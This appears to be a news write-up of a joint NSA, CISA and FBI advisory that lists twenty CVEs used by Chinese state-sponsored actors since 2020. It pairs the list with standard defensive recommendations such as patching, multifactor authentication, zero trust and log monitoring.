Chinese cyber threat actors are still exploiting known vulnerabilities of US and allied networks for the purpose of stealing intellectual property from tech companies.
CSA’s mission is to inform all the agencies under federal and state governments about these CVEs. Primarily focusing on the individuals and organizations that are involved in critical infrastructure.
CVEs used by Chinese state-sponsored cyber actors
PRC state-sponsored cyber activities are being assessed by the NSA, CISA, and FBI. Among the most significant and dynamic threats to the U.S. government and civilian infrastructure are state-sponsored actors with ties to the PRC.
Here below we have mentioned all the CVEs that are most used by the Chinese state-sponsored threat actors since 2020:-
- CVE-2021-44228: Remote Code Execution
- CVE-2019-11510: Arbitrary File Read
- CVE-2021-22205: Remote Code Execution
- CVE-2022-26134: Remote Code Execution
- CVE-2021-26855: Remote Code Execution
- CVE-2020-5902: Remote Code Execution
- CVE-2021-22005: Arbitrary File Upload
- CVE-2019-19781: Path Traversal
- CVE-2021-1497: Command Line Execution
- CVE-2021-20090: Relative Path Traversal
- CVE-2021-26084: Remote Code Execution
- CVE-2021-36260: Command Injection
- CVE-2021-42237: Remote Code Execution
- CVE-2022-1388: Remote Code Execution
- CVE-2022-24112: Authentication Bypass by Spoofing
- CVE-2021-40539: Remote Code Execution
- CVE-2021-26857: Remote Code Execution
- CVE-2021-26858: Remote Code Execution
- CVE-2021-27065: Remote Code Execution
- CVE-2021-41773: Path Traversal
In order to gain access to web-facing applications, state-sponsored threat actors continue to use VPNs as a means of obscuring their activities.
It should be noted that a number of the CVEs listed above allow for unauthorized access to sensitive networks to be gained by the actors in a stealthy manner.
Organizations are encouraged by the NSA, CISA, and FBI to apply these recommendations mentioned below as soon as possible:-
- Ensure that your systems are up to date and patched.
- In conjunction with other exploited vulnerabilities within the CSA, patches should be prioritized in order to address these vulnerabilities.
- Multifactor authentication should be used whenever possible in order to avoid phishing attacks.
- Ensure that your passwords are strong and unique at all times.
- At the network edge, block obsolete or unused protocols in order to safeguard the network.
- Make sure that your end-of-life equipment is upgraded or replaced as soon as possible.
- Make a move toward a security model based on Zero Trust.
- Monitor the log files of Internet-facing systems for anomalous activity and enable robust logging of those systems.